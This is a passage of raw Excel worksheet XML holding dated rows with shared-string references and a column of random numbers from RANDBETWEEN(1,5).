        <v>1</v>
      </c>
    </row>
    <row r="26645" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A26645" s="1">
        <v>42912.407326388886</v>
      </c>
      <c r="C26645" t="s">
        <v>253</v>
      </c>
      <c r="E26645" s="2" t="s">
        <v>24221</v>
      </c>
      <c r="F26645">
        <f t="shared" ca="1" si="416"/>
        <v>3</v>
      </c>
    </row>
    <row r="26646" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26646" s="1">
        <v>42912.369467592594</v>
      </c>
      <c r="C26646" t="s">
        <v>60</v>
      </c>
      <c r="E26646" t="s">
        <v>24222</v>
      </c>
      <c r="F26646">
        <f t="shared" ca="1" si="416"/>
        <v>2</v>
      </c>
    </row>
    <row r="26647" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26647" s="1">
        <v>42912.362025462964</v>
      </c>
      <c r="C26647" t="s">
        <v>10</v>
      </c>
      <c r="D26647" t="s">
        <v>56</v>
      </c>
      <c r="E26647" t="s">
        <v>24223</v>
      </c>
      <c r="F26647">
        <f t="shared" ca="1" si="416"/>
        <v>4</v>
      </c>
    </row>
    <row r="26648" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A26648" s="1">
        <v>42912.3594212963</v>
      </c>
      <c r="C26648" t="s">
        <v>60</v>
      </c>
      <c r="E26648" s="2" t="s">
        <v>24224</v>
      </c>
      <c r="F26648">
        <f t="shared" ca="1" si="416"/>
        <v>1</v>
      </c>
    </row>
    <row r="26649" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26649" s="1">
        <v>42912.262650462966</v>
      </c>
      <c r="C26649" t="s">
        <v>43</v>
      </c>
      <c r="E26649" s="2" t="s">
        <v>24225</v>
      </c>
      <c r="F26649">
        <f t="shared" ca="1" si="416"/>
        <v>5</v>
      </c>
    </row>
    <row r="26650" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A26650" s="1">
        <v>42912.257245370369</v>
      </c>
      <c r="C26650" t="s">
        <v>173</v>
      </c>
      <c r="E26650" s="2" t="s">
        <v>24226</v>
      </c>
      <c r="F26650">
        <f t="shared" ca="1" si="416"/>
        <v>1</v>
      </c>
    </row>
    <row r="26651" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26651" s="1">
        <v>42912.23978009259</v>
      </c>
      <c r="C26651" t="s">
        <v>542</v>
      </c>
      <c r="E26651" t="s">
        <v>24227</v>
      </c>
      <c r="F26651">
        <f t="shared" ca="1" si="416"/>
        <v>2</v>
      </c>
    </row>
    <row r="26652" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A26652" s="1">
        <v>42912.212002314816</v>
      </c>
      <c r="C26652" t="s">
        <v>71</v>
      </c>
      <c r="E26652" s="2" t="s">
        <v>24228</v>
      </c>
      <c r="F26652">
        <f t="shared" ca="1" si="416"/>
        <v>1</v>
      </c>
    </row>
    <row r="26653" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26653" s="1">
        <v>42912.172442129631</v>
      </c>
      <c r="C26653" t="s">
        <v>69</v>
      </c>
      <c r="E26653" t="s">
        <v>24229</v>
      </c>
      <c r="F26653">
        <f t="shared" ca="1" si="416"/>
        <v>2</v>
      </c>
    </row>
    <row r="26654" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A26654" s="1">
        <v>42912.166006944448</v>
      </c>
      <c r="C26654" t="s">
        <v>73</v>
      </c>
      <c r="E26654" s="2" t="s">
        <v>24230</v>
      </c>
      <c r="F26654">
        <f t="shared" ca="1" si="416"/>
        <v>1</v>
      </c>
    </row>
    <row r="26655" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26655" s="1">
        <v>42912.14744212963</v>
      </c>
      <c r="C26655" t="s">
        <v>43</v>
      </c>
      <c r="E26655" s="2" t="s">
        <v>24231</v>
      </c>
      <c r="F26655">
        <f t="shared" ca="1" si="416"/>
        <v>1</v>
      </c>
    </row>
    <row r="26656" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26656" s="1">
        <v>42912.144652777781</v>
      </c>
      <c r="C26656" t="s">
        <v>139</v>
      </c>
      <c r="E26656" t="s">
        <v>24232</v>
      </c>
      <c r="F26656">
        <f t="shared" ca="1" si="416"/>
        <v>1</v>
      </c>
    </row>
    <row r="26657" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A26657" s="1">
        <v>42912.016261574077</v>
      </c>
      <c r="C26657" t="s">
        <v>140</v>
      </c>
      <c r="D26657" t="s">
        <v>141</v>
      </c>
      <c r="E26657" s="2" t="s">
        <v>24233</v>
      </c>
      <c r="F26657">
        <f t="shared" ca="1" si="416"/>
        <v>4</v>
      </c>
    </row>
    <row r="26658" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26658" s="1">
        <v>42911.842592592591</v>
      </c>
      <c r="C26658" t="s">
        <v>140</v>
      </c>
      <c r="D26658" t="s">
        <v>141</v>
      </c>
      <c r="E26658" t="s">
        <v>24234</v>
      </c>
      <c r="F26658">
        <f t="shared" ca="1" si="416"/>
        <v>2</v>
      </c>
    </row>
    <row r="26659" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A26659" s="1">
        <v>42911.647037037037</v>
      </c>
      <c r="C26659" t="s">
        <v>10</v>
      </c>
      <c r="D26659" t="s">
        <v>52</v>
      </c>
      <c r="E26659" s="2" t="s">
        <v>24235</v>
      </c>
      <c r="F26659">
        <f t="shared" ca="1" si="416"/>
        <v>3</v>
      </c>
    </row>
    <row r="26660" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A26660" s="1">
        <v>42911.352708333332</v>
      </c>
      <c r="C26660" t="s">
        <v>6</v>
      </c>
      <c r="D26660" t="s">
        <v>25</v>
      </c>
      <c r="E26660" s="2" t="s">
        <v>24236</v>
      </c>
      <c r="F26660">
        <f t="shared" ca="1" si="416"/>
        <v>5</v>
      </c>
    </row>
    <row r="26661" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A26661" s="1">
        <v>42911.334930555553</v>
      </c>
      <c r="C26661" t="s">
        <v>17</v>
      </c>
      <c r="E26661" s="2" t="s">
        <v>24237</v>
      </c>
      <c r="F26661">
        <f t="shared" ca="1" si="416"/>
        <v>1</v>
      </c>
    </row>
    <row r="26662" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A26662" s="1">
        <v>42910.881921296299</v>
      </c>
      <c r="C26662" t="s">
        <v>10</v>
      </c>
      <c r="D26662" t="s">
        <v>89</v>
      </c>
      <c r="E26662" s="2" t="s">
        <v>24238</v>
      </c>
      <c r="F26662">
        <f t="shared" ca="1" si="416"/>
        <v>4</v>
      </c>
    </row>
    <row r="26663" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26663" s="1">
        <v>42910.319224537037</v>
      </c>
      <c r="C26663" t="s">
        <v>17</v>
      </c>
      <c r="E26663" t="s">
        <v>24239</v>
      </c>
      <c r="F26663">
        <f t="shared" ca="1" si="416"/>
        <v>5</v>
      </c>
    </row>
    <row r="26664" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26664" s="1">
        <v>42909.720613425925</v>
      </c>
      <c r="C26664" t="s">
        <v>10</v>
      </c>
      <c r="D26664" t="s">
        <v>6</v>
      </c>
      <c r="E26664" t="s">
        <v>24240</v>
      </c>
      <c r="F26664">
        <f t="shared" ca="1" si="416"/>
        <v>5</v>
      </c>
    </row>
    <row r="26665" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26665" s="1">
        <v>42909.703113425923</v>
      </c>
      <c r="C26665" t="s">
        <v>10</v>
      </c>
      <c r="D26665" t="s">
        <v>107</v>
      </c>
      <c r="E26665" t="s">
        <v>24241</v>
      </c>
      <c r="F26665">
        <f t="shared" ca="1" si="416"/>
        <v>5</v>
      </c>
    </row>
    <row r="26666" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A26666" s="1">
        <v>42909.658750000002</v>
      </c>
      <c r="C26666" t="s">
        <v>2428</v>
      </c>
      <c r="E26666" s="2" t="s">
        <v>24242</v>
      </c>
      <c r="F26666">
        <f t="shared" ca="1" si="416"/>
        <v>5</v>
      </c>
    </row>
    <row r="26667" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26667" s="1">
        <v>42909.640300925923</v>
      </c>
      <c r="C26667" t="s">
        <v>10</v>
      </c>
      <c r="D26667" t="s">
        <v>6</v>
      </c>
      <c r="E26667" t="s">
        <v>24240</v>
      </c>
      <c r="F26667">
        <f t="shared" ca="1" si="416"/>
        <v>4</v>
      </c>
    </row>
    <row r="26668" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26668" s="1">
        <v>42909.632743055554</v>
      </c>
      <c r="C26668" t="s">
        <v>10</v>
      </c>
      <c r="D26668" t="s">
        <v>271</v>
      </c>
      <c r="E26668" t="s">
        <v>24243</v>
      </c>
      <c r="F26668">
        <f t="shared" ca="1" si="416"/>
        <v>3</v>
      </c>
    </row>
    <row r="26669" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26669" s="1">
        <v>42909.562581018516</v>
      </c>
      <c r="C26669" t="s">
        <v>10</v>
      </c>
      <c r="D26669" t="s">
        <v>107</v>
      </c>
      <c r="E26669" t="s">
        <v>24244</v>
      </c>
      <c r="F26669">
        <f t="shared" ca="1" si="416"/>
        <v>2</v>
      </c>
    </row>
    <row r="26670" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26670" s="1">
        <v>42909.549062500002</v>
      </c>
      <c r="C26670" t="s">
        <v>10</v>
      </c>
      <c r="D26670" t="s">
        <v>163</v>
      </c>
      <c r="E26670" t="s">
        <v>24245</v>
      </c>
      <c r="F26670">
        <f t="shared" ca="1" si="416"/>
        <v>3</v>
      </c>
    </row>
    <row r="26671" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A26671" s="1">
        <v>42909.53496527778</v>
      </c>
      <c r="C26671" t="s">
        <v>344</v>
      </c>
      <c r="E26671" s="2" t="s">
        <v>24246</v>
      </c>
      <c r="F26671">
        <f t="shared" ca="1" si="416"/>
        <v>4</v>
      </c>
    </row>
    <row r="26672" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26672" s="1">
        <v>42909.534884259258</v>
      </c>
      <c r="C26672" t="s">
        <v>60</v>
      </c>
      <c r="E26672" t="s">
        <v>24247</v>
      </c>
      <c r="F26672">
        <f t="shared" ca="1" si="416"/>
        <v>4</v>
      </c>
    </row>
    <row r="26673" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26673" s="1">
        <v>42909.507349537038</v>
      </c>
      <c r="C26673" t="s">
        <v>10375</v>
      </c>
      <c r="E26673" s="2" t="s">
        <v>24248</v>
      </c>
      <c r="F26673">
        <f t="shared" ca="1" si="416"/>
        <v>1</v>
      </c>
    </row>
    <row r="26674" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26674" s="1">
        <v>42909.506458333337</v>
      </c>
      <c r="C26674" t="s">
        <v>10</v>
      </c>
      <c r="D26674" t="s">
        <v>23</v>
      </c>
      <c r="E26674" t="s">
        <v>24249</v>
      </c>
      <c r="F26674">
        <f t="shared" ca="1" si="416"/>
        <v>1</v>
      </c>
    </row>
    <row r="26675" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26675" s="1">
        <v>42909.494629629633</v>
      </c>
      <c r="C26675" t="s">
        <v>10</v>
      </c>
      <c r="D26675" t="s">
        <v>178</v>
      </c>
      <c r="E26675" t="s">
        <v>24250</v>
      </c>
      <c r="F26675">
        <f t="shared" ca="1" si="416"/>
        <v>5</v>
      </c>
    </row>
    <row r="26676" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26676" s="1">
        <v>42909.461539351854</v>
      </c>
      <c r="C26676" t="s">
        <v>10</v>
      </c>
      <c r="D26676" t="s">
        <v>20</v>
      </c>
      <c r="E26676" t="s">
        <v>24251</v>
      </c>
      <c r="F26676">
        <f t="shared" ca="1" si="416"/>
        <v>3</v>
      </c>
    </row>
    <row r="26677" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26677" s="1">
        <v>42909.443090277775</v>
      </c>
      <c r="C26677" t="s">
        <v>10</v>
      </c>
      <c r="D26677" t="s">
        <v>151</v>
      </c>
      <c r="E26677" t="s">
        <v>24252</v>
      </c>
      <c r="F26677">
        <f t="shared" ca="1" si="416"/>
        <v>2</v>
      </c>
    </row>
    <row r="26678" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A26678" s="1">
        <v>42909.421550925923</v>
      </c>
      <c r="C26678" t="s">
        <v>10</v>
      </c>
      <c r="D26678" t="s">
        <v>52</v>
      </c>
      <c r="E26678" s="2" t="s">
        <v>24253</v>
      </c>
      <c r="F26678">
        <f t="shared" ca="1" si="416"/>
        <v>5</v>
      </c>
    </row>
    <row r="26679" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26679" s="1">
        <v>42909.392013888886</v>
      </c>
      <c r="C26679" t="s">
        <v>10</v>
      </c>
      <c r="D26679" t="s">
        <v>112</v>
      </c>
      <c r="E26679" t="s">
        <v>24254</v>
      </c>
      <c r="F26679">
        <f t="shared" ca="1" si="416"/>
        <v>5</v>
      </c>
    </row>
    <row r="26680" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26680" s="1">
        <v>42909.391631944447</v>
      </c>
      <c r="C26680" t="s">
        <v>10</v>
      </c>
      <c r="D26680" t="s">
        <v>112</v>
      </c>
      <c r="F26680">
        <f t="shared" ca="1" si="416"/>
        <v>4</v>
      </c>
    </row>
    <row r="26681" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26681" s="1">
        <v>42909.388159722221</v>
      </c>
      <c r="C26681" t="s">
        <v>10</v>
      </c>
      <c r="D26681" t="s">
        <v>192</v>
      </c>
      <c r="E26681" t="s">
        <v>24255</v>
      </c>
      <c r="F26681">
        <f t="shared" ca="1" si="416"/>
        <v>2</v>
      </c>
    </row>
    <row r="26682" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A26682" s="1">
        <v>42909.333969907406</v>
      </c>
      <c r="C26682" t="s">
        <v>124</v>
      </c>
      <c r="E26682" s="2" t="s">
        <v>24256</v>
      </c>
      <c r="F26682">
        <f t="shared" ca="1" si="416"/>
        <v>3</v>
      </c>
    </row>
    <row r="26683" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26683" s="1">
        <v>42909.287476851852</v>
      </c>
      <c r="C26683" t="s">
        <v>48</v>
      </c>
      <c r="E26683" t="s">
        <v>24257</v>
      </c>
      <c r="F26683">
        <f t="shared" ca="1" si="416"/>
        <v>2</v>
      </c>
    </row>
    <row r="26684" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A26684" s="1">
        <v>42909.283854166664</v>
      </c>
      <c r="C26684" t="s">
        <v>71</v>
      </c>
      <c r="E26684" s="2" t="s">
        <v>24258</v>
      </c>
      <c r="F26684">
        <f t="shared" ca="1" si="416"/>
        <v>4</v>
      </c>
    </row>
    <row r="26685" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26685" s="1">
        <v>42909.272939814815</v>
      </c>
      <c r="C26685" t="s">
        <v>48</v>
      </c>
      <c r="E26685" t="s">
        <v>24259</v>
      </c>
      <c r="F26685">
        <f t="shared" ca="1" si="416"/>
        <v>3</v>
      </c>
    </row>
    <row r="26686" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A26686" s="1">
        <v>42909.264351851853</v>
      </c>
      <c r="C26686" t="s">
        <v>41</v>
      </c>
      <c r="E26686" s="2" t="s">
        <v>24260</v>
      </c>
      <c r="F26686">
        <f t="shared" ca="1" si="416"/>
        <v>1</v>
      </c>
    </row>
    <row r="26687" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A26687" s="1">
        <v>42909.243576388886</v>
      </c>
      <c r="C26687" t="s">
        <v>41</v>
      </c>
      <c r="E26687" s="2" t="s">
        <v>24261</v>
      </c>
      <c r="F26687">
        <f t="shared" ca="1" si="416"/>
        <v>2</v>
      </c>
    </row>
    <row r="26688" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26688" s="1">
        <v>42909.137615740743</v>
      </c>
      <c r="C26688" t="s">
        <v>41</v>
      </c>
      <c r="E26688" t="s">
        <v>24262</v>
      </c>
      <c r="F26688">
        <f t="shared" ca="1" si="416"/>
        <v>3</v>
      </c>
    </row>
    <row r="26689" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26689" s="1">
        <v>42909.100543981483</v>
      </c>
      <c r="C26689" t="s">
        <v>845</v>
      </c>
      <c r="E26689" t="s">
        <v>24263</v>
      </c>
      <c r="F26689">
        <f t="shared" ca="1" si="416"/>
        <v>3</v>
      </c>
    </row>
    <row r="26690" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26690" s="1">
        <v>42909.066458333335</v>
      </c>
      <c r="C26690" t="s">
        <v>845</v>
      </c>
      <c r="E26690" t="s">
        <v>24264</v>
      </c>
      <c r="F26690">
        <f t="shared" ref="F26690:F26753" ca="1" si="417">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="26691" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26691" s="1">
        <v>42908.940775462965</v>
      </c>
      <c r="C26691" t="s">
        <v>6</v>
      </c>
      <c r="D26691" t="s">
        <v>25</v>
      </c>
      <c r="E26691" t="s">
        <v>24265</v>
      </c>
      <c r="F26691">
        <f t="shared" ca="1" si="417"/>
        <v>1</v>
      </c>
    </row>
    <row r="26692" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26692" s="1">
        <v>42908.895057870373</v>
      </c>
      <c r="C26692" t="s">
        <v>140</v>
      </c>
      <c r="D26692" t="s">
        <v>847</v>
      </c>
      <c r="E26692" t="s">
        <v>24266</v>
      </c>
      <c r="F26692">
        <f t="shared" ca="1" si="417"/>
        <v>5</v>
      </c>
    </row>
    <row r="26693" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26693" s="1">
        <v>42908.886840277781</v>
      </c>
      <c r="C26693" t="s">
        <v>103</v>
      </c>
      <c r="D26693" t="s">
        <v>25</v>
      </c>
      <c r="E26693" t="s">
        <v>24267</v>
      </c>
      <c r="F26693">
        <f t="shared" ca="1" si="417"/>
        <v>1</v>
      </c>
    </row>
    <row r="26694" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26694" s="1">
        <v>42908.844583333332</v>
      </c>
      <c r="C26694" t="s">
        <v>907</v>
      </c>
      <c r="D26694" t="s">
        <v>251</v>
      </c>
      <c r="E26694" t="s">
        <v>24268</v>
      </c>
      <c r="F26694">
        <f t="shared" ca="1" si="417"/>
        <v>4</v>
      </c>
    </row>
    <row r="26695" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A26695" s="1">
        <v>42908.790949074071</v>
      </c>
      <c r="C26695" t="s">
        <v>3027</v>
      </c>
      <c r="E26695" s="2" t="s">
        <v>24269</v>
      </c>
      <c r="F26695">
        <f t="shared" ca="1" si="417"/>
        <v>3</v>
      </c>
    </row>
    <row r="26696" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26696" s="1">
        <v>42908.760729166665</v>
      </c>
      <c r="C26696" t="s">
        <v>10</v>
      </c>
      <c r="D26696" t="s">
        <v>107</v>
      </c>
      <c r="E26696" t="s">
        <v>24270</v>
      </c>
      <c r="F26696">
        <f t="shared" ca="1" si="417"/>
        <v>2</v>
      </c>
    </row>
    <row r="26697" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26697" s="1">
        <v>42908.707372685189</v>
      </c>
      <c r="C26697" t="s">
        <v>10</v>
      </c>
      <c r="D26697" t="s">
        <v>151</v>
      </c>
      <c r="E26697" t="s">
        <v>24271</v>
      </c>
      <c r="F26697">
        <f t="shared" ca="1" si="417"/>
        <v>5</v>
      </c>
    </row>
    <row r="26698" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26698" s="1">
        <v>42908.687037037038</v>
      </c>
      <c r="C26698" t="s">
        <v>260</v>
      </c>
      <c r="E26698" t="s">
        <v>24272</v>
      </c>
      <c r="F26698">
        <f t="shared" ca="1" si="417"/>
        <v>1</v>
      </c>
    </row>
    <row r="26699" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A26699" s="1">
        <v>42908.671435185184</v>
      </c>
      <c r="C26699" t="s">
        <v>10</v>
      </c>
      <c r="D26699" t="s">
        <v>163</v>
      </c>
      <c r="E26699" s="2" t="s">
        <v>24273</v>
      </c>
      <c r="F26699">
        <f t="shared" ca="1" si="417"/>
        <v>5</v>
      </c>
    </row>
    <row r="26700" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26700" s="1">
        <v>42908.651631944442</v>
      </c>
      <c r="C26700" t="s">
        <v>10</v>
      </c>
      <c r="D26700" t="s">
        <v>86</v>
      </c>
      <c r="F26700">
        <f t="shared" ca="1" si="417"/>
        <v>2</v>
      </c>
    </row>
    <row r="26701" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26701" s="1">
        <v>42908.6409375</v>
      </c>
      <c r="C26701" t="s">
        <v>10</v>
      </c>
      <c r="D26701" t="s">
        <v>33</v>
      </c>
      <c r="E26701" t="s">
        <v>24274</v>
      </c>
      <c r="F26701">
        <f t="shared" ca="1" si="417"/>
        <v>5</v>
      </c>
    </row>
    <row r="26702" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26702" s="1">
        <v>42908.63658564815</v>
      </c>
      <c r="C26702" t="s">
        <v>10</v>
      </c>
      <c r="D26702" t="s">
        <v>17</v>
      </c>
      <c r="E26702" t="s">
        <v>24275</v>
      </c>
      <c r="F26702">
        <f t="shared" ca="1" si="417"/>
        <v>5</v>
      </c>
    </row>
    <row r="26703" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A26703" s="1">
        <v>42908.622430555559</v>
      </c>
      <c r="C26703" t="s">
        <v>10</v>
      </c>
      <c r="D26703" t="s">
        <v>494</v>
      </c>
      <c r="E26703" s="2" t="s">
        <v>24276</v>
      </c>
      <c r="F26703">
        <f t="shared" ca="1" si="417"/>
        <v>1</v>
      </c>
    </row>
    <row r="26704" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26704" s="1">
        <v>42908.622291666667</v>
      </c>
      <c r="C26704" t="s">
        <v>10</v>
      </c>
      <c r="D26704" t="s">
        <v>192</v>
      </c>
      <c r="E26704" t="s">
        <v>24277</v>
      </c>
      <c r="F26704">
        <f t="shared" ca="1" si="417"/>
        <v>3</v>
      </c>
    </row>
    <row r="26705" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26705" s="1">
        <v>42908.620439814818</v>
      </c>
      <c r="C26705" t="s">
        <v>10</v>
      </c>
      <c r="D26705" t="s">
        <v>36</v>
      </c>
      <c r="E26705" t="s">
        <v>24278</v>
      </c>
      <c r="F26705">
        <f t="shared" ca="1" si="417"/>
        <v>2</v>
      </c>
    </row>
    <row r="26706" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26706" s="1">
        <v>42908.619270833333</v>
      </c>
      <c r="C26706" t="s">
        <v>10</v>
      </c>
      <c r="D26706" t="s">
        <v>11</v>
      </c>
      <c r="E26706" t="s">
        <v>24279</v>
      </c>
      <c r="F26706">
        <f t="shared" ca="1" si="417"/>
        <v>5</v>
      </c>
    </row>
    <row r="26707" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A26707" s="1">
        <v>42908.616041666668</v>
      </c>
      <c r="C26707" t="s">
        <v>10</v>
      </c>
      <c r="D26707" t="s">
        <v>89</v>
      </c>
      <c r="E26707" s="2" t="s">
        <v>24280</v>
      </c>
      <c r="F26707">
        <f t="shared" ca="1" si="417"/>
        <v>2</v>
      </c>
    </row>
    <row r="26708" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A26708" s="1">
        <v>42908.614432870374</v>
      </c>
      <c r="C26708" t="s">
        <v>10</v>
      </c>
      <c r="D26708" t="s">
        <v>89</v>
      </c>
      <c r="E26708" s="2" t="s">
        <v>24281</v>
      </c>
      <c r="F26708">
        <f t="shared" ca="1" si="417"/>
        <v>1</v>
      </c>
    </row>
    <row r="26709" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26709" s="1">
        <v>42908.608587962961</v>
      </c>
      <c r="C26709" t="s">
        <v>6</v>
      </c>
      <c r="D26709" t="s">
        <v>114</v>
      </c>
      <c r="E26709" s="2" t="s">
        <v>24282</v>
      </c>
      <c r="F26709">
        <f t="shared" ca="1" si="417"/>
        <v>3</v>
      </c>
    </row>
    <row r="26710" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A26710" s="1">
        <v>42908.600891203707</v>
      </c>
      <c r="C26710" t="s">
        <v>2545</v>
      </c>
      <c r="E26710" s="2" t="s">
        <v>24283</v>
      </c>
      <c r="F26710">
        <f t="shared" ca="1" si="417"/>
        <v>2</v>
      </c>
    </row>
    <row r="26711" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26711" s="1">
        <v>42908.529479166667</v>
      </c>
      <c r="C26711" t="s">
        <v>10</v>
      </c>
      <c r="D26711" t="s">
        <v>6</v>
      </c>
      <c r="E26711" t="s">
        <v>24284</v>
      </c>
      <c r="F26711">
        <f t="shared" ca="1" si="417"/>
        <v>1</v>
      </c>
    </row>
    <row r="26712" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26712" s="1">
        <v>42908.48678240741</v>
      </c>
      <c r="C26712" t="s">
        <v>10</v>
      </c>
      <c r="D26712" t="s">
        <v>36</v>
      </c>
      <c r="E26712" t="s">
        <v>24285</v>
      </c>
      <c r="F26712">
        <f t="shared" ca="1" si="417"/>
        <v>1</v>
      </c>
    </row>
    <row r="26713" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26713" s="1">
        <v>42908.483865740738</v>
      </c>
      <c r="C26713" t="s">
        <v>10</v>
      </c>
      <c r="D26713" t="s">
        <v>330</v>
      </c>
      <c r="E26713" s="2" t="s">
        <v>24286</v>
      </c>
      <c r="F26713">
        <f t="shared" ca="1" si="417"/>
        <v>2</v>
      </c>
    </row>
    <row r="26714" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26714" s="1">
        <v>42908.467002314814</v>
      </c>
      <c r="C26714" t="s">
        <v>10</v>
      </c>
      <c r="D26714" t="s">
        <v>20</v>
      </c>
      <c r="E26714" t="s">
        <v>24287</v>
      </c>
      <c r="F26714">
        <f t="shared" ca="1" si="417"/>
        <v>2</v>
      </c>
    </row>
    <row r="26715" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26715" s="1">
        <v>42908.464513888888</v>
      </c>
      <c r="C26715" t="s">
        <v>10</v>
      </c>
      <c r="D26715" t="s">
        <v>23</v>
      </c>
      <c r="E26715" t="s">
        <v>24288</v>
      </c>
      <c r="F26715">
        <f t="shared" ca="1" si="417"/>
        <v>3</v>
      </c>
    </row>
    <row r="26716" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A26716" s="1">
        <v>42908.454768518517</v>
      </c>
      <c r="C26716" t="s">
        <v>10</v>
      </c>
      <c r="D26716" t="s">
        <v>112</v>
      </c>
      <c r="E26716" s="2" t="s">
        <v>24289</v>
      </c>
      <c r="F26716">
        <f t="shared" ca="1" si="417"/>
        <v>2</v>
      </c>
    </row>
    <row r="26717" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A26717" s="1">
        <v>42908.451006944444</v>
      </c>
      <c r="C26717" t="s">
        <v>48</v>
      </c>
      <c r="E26717" s="2" t="s">
        <v>24290</v>
      </c>
      <c r="F26717">
        <f t="shared" ca="1" si="417"/>
        <v>2</v>
      </c>
    </row>
    <row r="26718" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A26718" s="1">
        <v>42908.45034722222</v>
      </c>
      <c r="C26718" t="s">
        <v>10</v>
      </c>
      <c r="D26718" t="s">
        <v>20</v>
      </c>
      <c r="E26718" s="2" t="s">
        <v>24291</v>
      </c>
      <c r="F26718">
        <f t="shared" ca="1" si="417"/>
        <v>3</v>
      </c>
    </row>
    <row r="26719" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26719" s="1">
        <v>42908.449930555558</v>
      </c>
      <c r="C26719" t="s">
        <v>6</v>
      </c>
      <c r="D26719" t="s">
        <v>25</v>
      </c>
      <c r="E26719" t="s">
        <v>24292</v>
      </c>
      <c r="F26719">
        <f t="shared" ca="1" si="417"/>
        <v>3</v>
      </c>
    </row>
    <row r="26720" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26720" s="1">
        <v>42908.447974537034</v>
      </c>
      <c r="C26720" t="s">
        <v>10</v>
      </c>
      <c r="D26720" t="s">
        <v>36</v>
      </c>
      <c r="E26720" t="s">
        <v>24293</v>
      </c>
      <c r="F26720">
        <f t="shared" ca="1" si="417"/>
        <v>4</v>
      </c>
    </row>
    <row r="26721" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A26721" s="1">
        <v>42908.421469907407</v>
      </c>
      <c r="C26721" t="s">
        <v>10</v>
      </c>
      <c r="D26721" t="s">
        <v>112</v>
      </c>
      <c r="E26721" s="2" t="s">
        <v>24294</v>
      </c>
      <c r="F26721">
        <f t="shared" ca="1" si="417"/>
        <v>1</v>
      </c>
    </row>
    <row r="26722" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26722" s="1">
        <v>42908.415011574078</v>
      </c>
      <c r="C26722" t="s">
        <v>10</v>
      </c>
      <c r="D26722" t="s">
        <v>163</v>
      </c>
      <c r="E26722" s="2" t="s">
        <v>24295</v>
      </c>
      <c r="F26722">
        <f t="shared" ca="1" si="417"/>
        <v>1</v>
      </c>
    </row>
